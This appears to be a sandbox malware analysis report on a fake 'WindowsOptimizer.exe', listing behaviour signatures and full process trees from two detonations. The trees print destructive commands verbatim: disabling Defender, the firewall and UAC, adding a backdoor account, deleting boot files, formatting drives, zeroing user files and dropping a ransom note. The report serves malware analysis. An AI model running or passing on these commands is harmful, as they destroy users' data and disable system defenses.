Analysis Overview
SHA256
d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
Threat Level: Known bad
The file WindowsOptimizer.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies boot configuration data using bcdedit
Disables RegEdit via registry modification
Stops running service(s)
Disables Task Manager via registry modification
Modifies Windows Firewall
Writes to the Master Boot Record (MBR)
Indicator Removal: File Deletion
Enumerates connected drives
Launches sc.exe
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Runs net.exe
Suspicious use of SendNotifyMessage
Modifies registry key
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 21:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 21:27
Reported
2024-11-09 21:58
Platform
win7-20240903-en
Max time kernel
2s
Max time network
3s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\X: | C:\Windows\system32\mountvol.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\system32\format.com | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\format.com | N/A |
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
C:\Windows\system32\sc.exe
sc config wuauserv start=disabled
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
C:\Windows\system32\net.exe
net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"
C:\Windows\system32\cipher.exe
cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
C:\Windows\system32\bcdedit.exe
bcdedit /delete {bootmgr} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {default} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /s
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"
C:\Windows\system32\mountvol.exe
mountvol X: /s
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /d
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"
C:\Windows\system32\mountvol.exe
mountvol X: /d
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"
C:\Windows\system32\format.com
format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
C:\Windows\system32\format.com
format D: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
C:\Windows\system32\format.com
format E: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 21:27
Reported
2024-11-09 21:28
Platform
win10v2004-20241007-en
Max time kernel
2s
Max time network
3s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\D: | C:\Windows\system32\format.com | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\format.com | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\mountvol.exe | N/A |
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
C:\Windows\system32\sc.exe
sc config wuauserv start=disabled
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
C:\Windows\system32\net.exe
net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cipher.exe
cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {bootmgr} /f
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
C:\Windows\system32\bcdedit.exe
bcdedit /delete {default} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /s
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"
C:\Windows\system32\mountvol.exe
mountvol X: /s
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /d
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"
C:\Windows\system32\mountvol.exe
mountvol X: /d
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"
C:\Windows\system32\format.com
format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
C:\Windows\system32\format.com
format D: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
C:\Windows\system32\format.com
format E: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
